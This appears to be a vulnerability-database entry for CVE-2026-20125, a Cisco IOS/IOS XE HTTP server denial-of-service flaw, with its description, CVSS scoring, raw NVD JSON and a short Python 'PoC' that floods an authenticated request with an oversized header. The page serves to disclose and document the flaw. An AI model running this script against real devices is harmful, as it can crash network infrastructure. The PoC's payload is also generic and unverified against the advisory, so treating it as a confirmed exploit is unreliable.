Security Vulnerability Report
CVE-2026-20125 CVSS 7.7 HIGH

CVE-2026-20125

Published: 2026-03-25 16:16:17
Last Modified: 2026-03-26 15:13:16

Description

A vulnerability in the HTTP Server feature of Cisco IOS Software and Cisco IOS XE Software Release 3E could allow an authenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malformed HTTP requests to an affected device. A successful exploit could allow the attacker to cause a watchdog timer to expire and the device to reload, resulting in a DoS condition. To exploit this vulnerability, the attacker must have a valid user account.

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Cisco IOS XE Software Release 3E
Cisco IOS Software (refer to the Cisco security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
from requests.auth import HTTPBasicAuth

# Exploit Title: Cisco IOS XE HTTP Server DoS (CVE-2026-20125)
# Description: Sends malformed HTTP requests to trigger watchdog timer.

target_url = "http://<TARGET_IP>/"
username = "<USERNAME>"
password = "<PASSWORD>"

# Crafted malformed input to exploit improper validation
malicious_headers = {
    "User-Agent": "Mozilla/5.0",
    "X-Custom-Long-Header": "A" * 5000
}

try:
    # Send authenticated request with malicious payload
    # Note: Exploitation requires valid credentials (PR:L)
    response = requests.get(
        target_url,
        headers=malicious_headers,
        auth=HTTPBasicAuth(username, password),
        timeout=5
    )
    print("Request sent. Monitor device for reload.")
except Exception as e:
    print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20125", "sourceIdentifier": "[email protected]", "published": "2026-03-25T16:16:16.750", "lastModified": "2026-03-26T15:13:15.790", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the HTTP Server feature of Cisco IOS Software and Cisco IOS XE Software Release 3E could allow an authenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition.\r\n\r This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malformed HTTP requests to an affected device. A successful exploit could allow the attacker to cause a watchdog timer to expire and the device to reload, resulting in a DoS condition. To exploit this vulnerability, the attacker must have a valid user account."}, {"lang": "es", "value": "Una vulnerabilidad en la característica de servidor HTTP de Cisco IOS Software y Cisco IOS XE Software Release 3E podría permitir a un atacante remoto autenticado causar que un dispositivo afectado se recargue inesperadamente, lo que resultaría en una condición de denegación de servicio (DoS). Esta vulnerabilidad se debe a una validación incorrecta de la entrada proporcionada por el usuario. Un atacante podría explotar esta vulnerabilidad enviando solicitudes HTTP malformadas a un dispositivo afectado. Un exploit exitoso podría permitir al atacante causar que un temporizador watchdog expire y que el dispositivo se recargue, lo que resultaría en una condición de DoS. Para explotar esta vulnerabilidad, el atacante debe tener una cuenta de usuario válida."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-228"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ios-http-dos-sbv8XRpL", "source": "[email protected]"}]}}